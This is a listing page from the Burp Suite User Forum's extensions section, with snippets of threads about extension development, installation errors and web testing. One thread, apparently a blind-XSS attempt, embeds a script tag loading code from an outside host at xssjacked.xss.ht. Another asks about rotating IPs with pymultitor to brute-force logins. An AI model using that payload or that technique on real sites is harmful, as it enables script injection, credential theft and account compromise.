Burp Extensions - Page 3 - Burp Suite User Forum

Development Code review Best Practices.

Hi Team, Please help us to test the development code line by line using the burp automation tool by adding an extra tool/plugin to the burp extension/any other mothod. If not possible source code review, please suggest...

Bruteforcing with extension

The tested mobile app is using GNU ZIP(gzip) for making request and i am using Decompressor extension for view the gzzip data to modify parameter and then make request. .In repeater ill change a parameter in GZip data...

Active Scan++

Hi I would ask about Extension Active Scan++ .I'm not smart but what is idea to build some extension.It is not better implement this feature to Burp software .?? The Burp without this Active Scan++ is worse to find some...

Issue Marker Creation

Hello, Do you have any guidance as to where I can reference if I want to create a simple extension that marks applicable portions of requests and responses in already created issues so that it carries over when exporting...

IScanQueueItem.getIssues() not returning issues

I'm having the same problem... https://forum.portswigger.net/thread/iscanqueueitem-getissues-not-returning-issues-7f007100 I need a list of issues before removing duplicates. For this reason, I want to use...

how to use pymultitor with turbo intruder

Is there any way to use pymultitor on windows to attack on website with different different ip address + burp force the pass or user .

Autorize - IDOR Test

Hi, Right now I'm using Burp Extension Autorize to test for IDOR. I'm curious if there is any way, or maybe another extension, to make Autorize more automatic. For example, now I click on every button on the site to be...

BurpHttpMock - faulty behavior only on installed macos version

Hello, there's a difference in behavior of the extension between Burp installed through the macos installer and Burp running as jar (both are community version 2021.8.2) When the jar version is running, the extension works...

Secure Coding Testing

Hi Team, Please confirm that whether the secure coding testing is possible using the Burpsuite tool with the current license. Regards, Kabilan.

I can't install jython environments

Exception in thread "main" java.lang.ExceptionInInitializerError at org.python.core.PySystemState.<clinit>(PySystemState.java:73) at org.python.util.jython.main(jython.java:533) Caused by:...

Certificate

Hello, I am having problems with the certificate, when I upload it to fire fox I still cannot go to the sites, it says that the certificate is unreliable

HTTP Request Smuggler: Error in thread: Can't find the header: Connection. See error pane for stack trace.

When using the HTTP Request Smuggler extension (updated 06 Aug 2021) in Burp Suite Professional (v2021.8.2) to "Smuggle Probe", the probing failed with the following error message: Queued 1 attacks from 1 requests in 0...

Java extension Development: Determine if Request was edited

Hi, I'm developing a Burp Suite extension in Java, based on the "Custom logger" example here: https://portswigger.net/burp/extender#SampleExtensions I'd like to know how I can determine if a Request received by my logger...

Failed to open Jython JAR file in Burp Suite in macOS Big Sur

Failed to open Jython JAR file in Burp Suite, only getting this error for Python based Extensions, Java based ones are installing and loading ok. Only change I did was installing iTerm2 and oh-my-zsh, may be this screwed...

Problem with "Failed to open file"

Hi Team, I can't select file to upload burp extension. It shows "Failed to open file/folder" both burp extension and other language environment. I uninstalled and installed again before but it didn't help. I don't know...

Burp Extensions for Burp Enterprise

Hi, I'm a one of users of Burp Enterprise. I see that it's been mentioned that at the moment only java extensions are supported for Burp Enterprise. I had a question, would it work if I compile by Python extension into a...

Burp Suite Navigation Recorder

When I tried to record a login page, I used the copy to clipboard option, when I paste to the Recorded login secuences, the information that it paste is incomplete, and is not enough to complete the login process. I...

HTTP Request Smuggler Extension vs HTTP request smuggling scanner

When practicing the basic CL.TE lab ( Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability), I firstly used the HTTP Request Smuggler Extension -> Smuggle probe to test the lab main...

Ridiculous Trying to exploit"><script src=https://xssjacked.xss.ht></script> u for Blind XSS "><script src=https://xssjacked.xss.ht></script>

PLZ Work "><script src=https://xssjacked.xss.ht></script> . Never mind about . "><script src=https://xssjacked.xss.ht></script>

Installation Problem

Hi Team, Could you please consider unlocking the license key? I tried the same box and same user. When we try to open Burpsuite, we have faced a java error(no JVM found on your system) due to that we have...